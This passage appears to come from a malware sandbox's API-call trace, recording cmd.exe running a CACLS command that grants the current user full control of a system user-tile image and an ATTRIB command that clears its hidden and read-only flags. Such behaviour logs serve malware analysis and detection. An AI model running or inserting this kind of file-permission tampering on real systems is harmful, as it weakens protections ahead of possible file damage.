lpData=0x28e690*=0x1, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x0, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x40, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x40, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x40, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegCloseKey (hKey=0x40) returned 0x0 [0187.577] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e684 | out: phkResult=0x28e684*=0x40) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x40, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x1, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x1, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x0, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x9, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x9, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x9, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegCloseKey (hKey=0x40) returned 0x0 [0187.577] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886395 [0187.577] srand (_Seed=0x5b886395) [0187.577] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"" [0187.577] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"" [0187.578] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.578] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x61a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0187.578] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.578] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.578] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.578] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0187.578] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0187.578] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0187.578] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0187.578] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0187.578] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0187.578] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0187.578] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0187.578] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0187.578] GetEnvironmentStringsW () returned 0x62458* [0187.579] FreeEnvironmentStringsW (penv=0x62458) returned 1 [0187.579] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.579] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.579] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0187.579] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0187.579] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0187.579] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0187.579] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0187.579] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0187.579] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0187.579] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0187.579] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f450 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.579] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f450, lpFilePart=0x28f44c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f44c*="Desktop") returned 0x18 [0187.579] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.579] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f1cc | out: lpFindFileData=0x28f1cc) returned 0x60ae8 [0187.579] FindClose (in: hFindFile=0x60ae8 | out: hFindFile=0x60ae8) returned 1 [0187.579] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f1cc | out: lpFindFileData=0x28f1cc) returned 0x60ae8 [0187.579] FindClose (in: hFindFile=0x60ae8 | out: hFindFile=0x60ae8) returned 1 [0187.579] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f1cc | out: lpFindFileData=0x28f1cc) returned 0x60ae8 [0187.579] FindClose (in: hFindFile=0x60ae8 | out: hFindFile=0x60ae8) returned 1 [0187.580] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0187.580] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0187.580] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0187.580] GetEnvironmentStringsW () returned 0x60308* [0187.580] FreeEnvironmentStringsW (penv=0x60308) returned 1 [0187.580] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.580] GetConsoleOutputCP () returned 0x1b5 [0187.580] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.580] GetUserDefaultLCID () returned 0x409 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f590, cchData=128 | out: lpLCData="0") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f590, cchData=128 | out: lpLCData="0") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f590, cchData=128 | out: lpLCData="1") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0187.581] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0187.581] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0187.582] GetConsoleTitleW (in: lpConsoleTitle=0x509b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.582] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.582] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0187.582] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0187.582] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0187.583] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0187.615] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0187.615] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0187.615] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0187.615] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0187.615] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0187.615] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0187.615] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0187.618] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0187.618] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0187.618] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0187.618] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0187.618] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0187.618] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0187.618] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0187.620] GetConsoleTitleW (in: lpConsoleTitle=0x28f224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.620] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.621] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.621] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.621] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.621] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.621] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.621] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.621] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.621] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.621] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.621] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.621] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.621] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.621] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.621] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.621] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.621] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.621] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.621] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.621] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.621] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.621] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.621] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.621] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.621] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.621] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.621] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.621] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.621] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.621] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.621] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0187.621] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0187.621] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0187.622] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0187.622] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0187.622] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0187.622] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0187.622] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0187.622] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0187.622] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0187.622] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0187.622] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0187.622] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0187.622] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0187.622] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0187.622] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0187.622] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0187.622] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0187.622] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0187.622] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0187.622] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0187.622] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0187.622] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0187.622] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0187.622] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0187.622] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0187.622] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0187.622] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0187.622] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0187.622] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0187.622] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0187.622] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0187.622] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0187.622] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0187.622] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0187.622] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0187.622] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0187.622] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0187.622] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0187.622] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0187.622] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0187.623] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0187.623] SetErrorMode (uMode=0x0) returned 0x0 [0187.623] SetErrorMode (uMode=0x1) returned 0x0 [0187.623] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x61e98, lpFilePart=0x28ed44 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28ed44*="Desktop") returned 0x18 [0187.623] SetErrorMode (uMode=0x0) returned 0x1 [0187.623] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.623] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.628] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.629] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.629] GetLastError () returned 0x2 [0187.629] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.629] GetLastError () returned 0x2 [0187.629] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0x62180 [0187.629] FindClose (in: hFindFile=0x62180 | out: hFindFile=0x62180) returned 1 [0187.630] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.630] GetLastError () returned 0x2 [0187.630] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0x62180 [0187.630] FindClose (in: hFindFile=0x62180 | out: hFindFile=0x62180) returned 1 [0187.630] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.630] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.630] GetConsoleTitleW (in: lpConsoleTitle=0x28efb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.630] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee40, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef08 | out: lpAttributeList=0x28ee40, lpSize=0x28ef08) returned 1 [0187.630] UpdateProcThreadAttribute (in: lpAttributeList=0x28ee40, dwFlags=0x0, Attribute=0x60001, lpValue=0x28ef00, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x28ee40, lpPreviousValue=0x0) returned 1 [0187.630] GetStartupInfoW (in: lpStartupInfo=0x28edfc | out: lpStartupInfo=0x28edfc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0187.630] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0187.631] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x28ee9c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28eee8 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x28eee8*(hProcess=0x50, hThread=0x4c, dwProcessId=0xf00, dwThreadId=0x4f4)) returned 1 [0187.633] CloseHandle (hObject=0x4c) returned 1 [0187.633] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0187.634] GetEnvironmentStringsW () returned 0x60308* [0187.634] FreeEnvironmentStringsW (penv=0x60308) returned 1 [0187.634] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0187.839] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x28eddc | out: lpExitCode=0x28eddc*=0x0) returned 1 [0187.839] CloseHandle (hObject=0x50) returned 1 [0187.839] _vsnwprintf (in: _Buffer=0x28ef24, _BufferCount=0x13, _Format="%08X", _ArgList=0x28ede8 | out: _Buffer="00000000") returned 8 [0187.839] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0187.839] GetEnvironmentStringsW () returned 0x62410* [0187.839] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.839] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0187.839] GetEnvironmentStringsW () returned 0x62410* [0187.840] FreeEnvironmentStringsW (penv=0x62410) returned 1 [0187.840] DeleteProcThreadAttributeList (in: lpAttributeList=0x28ee40 | out: lpAttributeList=0x28ee40) [0187.840] GetConsoleTitleW (in: lpConsoleTitle=0x28f224, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.840] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.840] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0187.840] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.840] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.841] GetLastError () returned 0x2 [0187.841] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.841] GetLastError () returned 0x2 [0187.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0x5e4d8 [0187.841] FindClose (in: hFindFile=0x5e4d8 | out: hFindFile=0x5e4d8) returned 1 [0187.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0xffffffff [0187.841] GetLastError () returned 0x2 [0187.841] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x28eac0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28eac0) returned 0x5e4d8 [0187.841] FindClose (in: hFindFile=0x5e4d8 | out: hFindFile=0x5e4d8) returned 1 [0187.841] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0187.841] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0187.842] GetConsoleTitleW (in: lpConsoleTitle=0x28efb8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0187.842] InitializeProcThreadAttributeList (in: lpAttributeList=0x28ee40, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x28ef08 | out: lpAttributeList=0x28ee40, 